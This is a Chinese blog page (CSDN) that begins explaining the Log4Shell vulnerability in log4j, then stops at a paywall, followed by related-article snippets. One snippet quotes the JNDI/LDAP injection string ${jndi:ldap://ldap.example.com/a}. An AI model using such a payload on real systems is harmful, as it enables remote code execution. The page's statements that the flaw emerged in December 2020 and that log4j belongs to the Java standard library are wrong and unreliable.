log4Shell 漏洞到底是个啥?

最新推荐文章于 2024-08-15 09:08:26 发布
最新推荐文章于 2024-08-15 09:08:26 发布
阅读量1.3k 收藏 2
点赞数
文章标签: java python 编程语言 人工智能 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48923393/article/details/122151198
版权
本文深入解析了log4Shell漏洞,它是一个影响广泛、危害严重的Java库log4j中的漏洞。该漏洞允许攻击者通过预留的电话机制,利用JNDI和LDAP协议,泄露和操纵企业内部信息,甚至植入恶意程序。攻击者只需在系统中输入特殊注入语句,即可发起攻击。防止措施包括限制系统对外部网络的访问、禁用JNDI通信协议和打补丁。文章提醒开发者在追求功能和易用性时,不应忽视安全性,提高防护意识是关键。
摘要由CSDN通过智能技术生成

7bb0733f3c0b753c5bf2c5d1ed4c5154.png

文 | 李晓飞

来源:Python 技术「ID: pythonall」

8a7188337927fd8fb070cdf1416ea472.png


2020 年的12月,势必成为各个互联网公司年度最深刻的记忆。

在 12 月初,爆出了一个核弹级的系统漏洞,导致众多互联网公司内部服务器被发现,劫持,甚至植入程序。

尽管目前已经出台了修复补丁,但这个出现在最基础的应用最广泛的模块 log4j 上的漏洞还是让我们心有余悸。

为什么这么就没有被发现,为什么这个漏洞如此严重,这个漏洞到底是怎么回事?……

什么样的漏洞

log4j[1] 是 Java 标准库的模块,主要负责记录各种日志,和 Python 中的 logging[2] 类似。

log4j 功能强大,可以支持各种场景的日志记录需求,比如将日志输出到终端,将日志记录到文件,或者发送到日志服务器等等,可以说但凡需要记录日志的地方,log4j 是最佳选择。

正是由于这一点,log4j 才成为最常用的模块,加上互联网公司的基础设施都是由 java 构建的,所以 log4j 深入到每个公司的角角落落。

log4j 就像一个兢兢业业,任劳任怨的门卫老大爷,一丝不苟的记录着各种来访信息,以便系统排查问题。

为什么这样一个普通的,不起眼的模块会爆出一个惊天漏洞呢?

为了说明这个情况,我借鉴 少数派 PlatyHsu 的比喻[3]做讲解,即使你不会编程,不懂技术也可以理解。

最低0.47元/天 解锁文章
Python 技术
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
log4j漏洞原理及攻击流程
weixin_54603520的博客
05-14 2395
log4j漏洞最早出现在2021年11月24日一位阿里安全团队的员工发现的,上报到Apache之后,12月10日凌晨才被公开。该漏洞威胁等级较高。基本比肩与阿里当年的fastjson漏洞
[转发]理解 Log4Shell 漏洞
dingpwen的博客
12-17 730
自从Log4j漏洞曝光以来,关于Log4Shell 漏洞的文章满天飞,有讲历史的,有讲底层原理的,但即使看完文章,你也不懂Log4Shell 漏洞到底是啥,这里推荐一篇文章,讲的最清楚,看完后就明确知道Log4Shell 漏洞到底是啥 推荐文章地址:https://sspai.com/post/70394 笔记:Log4Shell 支持JNDI,JNDI与LDAP一结合,就会产生问题,只要设法让使用了 Log4j 的程序记下一条内容形如 ${jndi:ldap://ldap.example.com/a}.
推荐文章:log4sh - 打造高效稳定的Shell脚本日志系统
gitblog_00055的博客
06-19 475
推荐文章:log4sh - 打造高效稳定的Shell脚本日志系统 log4shlog4sh is an advanced logging framework for Unix shell scripts.项目地址:https://gitcode.com/gh_mirrors/lo/log4sh 项目介绍 在浩瀚的编程世界里,日志处理一直扮演着不可或缺的角色,尤其对于运维和开发者而言,它就像是一盏...
核弹级漏洞log4shell席卷全球!危及苹果腾讯百度网易,修改iPhone名称就可触发...
量子位
12-12 324
杨净 发自 凹非寺量子位 报道 | 公众号 QbitAI一时间,这个高危漏洞引发全球网络安全震荡!CVE-2021-44228,又名Log4Shell 。新西兰计算机紧急响应中心(CERT...
【互联网着火了?】理解让大厂纷纷沦陷的Log4Shell 漏洞
m0_46163918的博客
12-17 337
如果你多少关注信息安全资讯,或许在最近几天已经频繁听到 Log4Shell 这个漏洞的名字。让全世界大厂都手忙脚乱的代码漏洞,是怎么一步步成为噩梦的?
Web网络安全-----Log4j高危漏洞原理及修复
热门推荐
qq_51690690的博客
07-27 1万+
Log4j 即 log for java(java的日志) ,是Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就是,这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码。提示:以下是本篇文章正文内容,下面案例可供参考。
探索Log4Shell漏洞:一个易受攻击的Spring Boot应用
最新发布
gitblog_00340的博客
08-15 663
探索Log4Shell漏洞:一个易受攻击的Spring Boot应用 log4shell-vulnerable-appSpring Boot web application vulnerable to Log4Shell (CVE-2021-44228).项目地址:https://gitcode.com/gh_mirrors/lo/log4shell-vulnerable-app 项目介绍 在网...
測試 VMware vCenter 的 Log4Shell 漏洞 - HackMD1
08-04
Log4Shell漏洞,全称为CVE-2021-44228,是Apache Log4j2库中的一个严重远程代码执行漏洞。这个漏洞允许攻击者通过输入特定的日志格式字符串,触发Java Naming and Directory Interface (JNDI) 查找,进而执行任意...
若依框架使用的log4j2.16.0,修复log4j漏洞log4j2下载最新log4j2.16.0下载
12-16
在2021年底,一个重大的安全漏洞(CVE-2021-44228)被发现在Log4j2的早期版本中,这个漏洞被称为“Log4Shell”。攻击者可以利用这个漏洞通过精心构造的输入来执行任意代码,对系统造成严重威胁。 标题中提到的“log...
log4j2漏洞检测工具
05-07
Log4j2,一个广泛使用的Java日志框架,最近曝出的重大安全漏洞(CVE-2021-44228,被称为Log4Shell)引起了全球的关注。这个漏洞允许攻击者通过精心构造的日志输入执行远程代码,从而对系统造成严重威胁。为了解决这...
SHELL日志功能(log4sh)
10-13
强大的shell日志记录功能,可以自定义格式,自定义级别,简单易用!
〖工具〗log4Shell核弹级漏洞复现&Ladon批量检测
K8哥哥
12-18 4680
title: 〖工具〗log4Shell核弹级漏洞复现&Ladon批量检测 comments: true toc: true categories: exp tags: Log4j2 abbrlink: log4shell date: 2021-12-16 19:24:00 img: https://img-blog.csdnimg.cn/20210117163103552.jpg 漏洞简介 Apache Log4j2是一款优秀的Java日志框架。近日,漏洞银行安全团队注意到了Ap.
Log4Shell是什么?从Log4j漏洞说起
Trinity_Techologies的博客
01-04 4330
在开源Apache日志记录库Log4j中已发现了一个影响使用Java的设备和应用程序的新漏洞。该漏洞被称为Log4Shell,是目前互联网上最重大的安全漏洞,其严重程度为10分(满分10分),其影响有愈演愈烈之势。幸运的是,Perforce静态分析和SAST工具——Helix QAC和Klocwork——可以提供帮助。 在这里,我们将解释Log4j漏洞是什么,提供一个Log4j示例,并解释像Klocwork这样的SAST工具如何帮助预防和检测如Log4Shell这样的漏洞
什么是Log4ShellLog4j漏洞解读
weixin_49715102的博客
01-04 1027
一个影响使用Java的设备和应用程序的新漏洞已经在开源Apache日志库Log4j中被发现。该漏洞被称为Log4Shell,是目前互联网上最重要的安全漏洞,其严重程度为10分。幸运的是,Perforce静态分析和SAST工具——Helix QAC和Klocwork——可以提供帮助。 本文解释了什么是Log4j漏洞,提供了一个Log4j的例子,并解释了像Klocwork这样的SAST工具是如何帮助预防和检测漏洞的,比如Log4Shell。 什么是Log4j? Log4j是一个Java库,用于记录企业应用程.
Log4Shell 漏洞应用项目教程
gitblog_00872的博客
08-13 312
Log4Shell 漏洞应用项目教程 log4shell-vulnerable-appSpring Boot web application vulnerable to Log4Shell (CVE-2021-44228).项目地址:https://gitcode.com/gh_mirrors/lo/log4shell-vulnerable-app 1. 项目的目录结构及介绍 log4shell...
Apache Log4Net远程拒绝服务漏洞
heimen的专栏
04-01 2557
发布时间:2006-3-15 14:09:37文章作者:ADLab文章来源:启明星辰   BUGTRAQ ID: 17095CVE ID: CVE-2006-0743CNCVE ID:CNCVE-20060743漏洞消息时间:2006-03-14漏洞起因设计错误影响系统Apache Software
log4j漏洞学习
2301_79724395的博客
06-14 1193
其实学完之后回过头造成漏洞的原理就是Log4j引入了lookup接口原本的目的是来支持在日志输出时获取任意位置的Java对象。通过使用lookup接口,Log4j可以通过适当的配置和调用,动态地从程序运行环境中获取所需的对象,然后将其作为日志消息的一部分输出到日志目标中。
Log4 j 漏洞已被曝一年,曾支配 Java 界熬夜加班,如今仍四处潜伏......
Code Writers
12-15 345
值得庆幸的是,因为这个漏洞的严重程度,也引起了多方关注:Apache 方面迅速发布了 Log4j 漏洞补丁,程序员群体也火速展开了一场修复计算机系统的全球“竞赛”——在大多消费者没有受到影响的背后,是他们在背后夜以继日地紧急修复,与攻击者拼速度。但现实情况是,对于大多数程序员来说,这个“有时间了”的情况并不容易等到。在漏洞被发现之前,没有人料想到,这么一个基于 Java 的日志框架,影响范围竟如此之广——由于触发简单、攻击难度低、影响人群广泛,Log4j 漏洞也被业内称为“史诗级”、“核弹级”高危漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值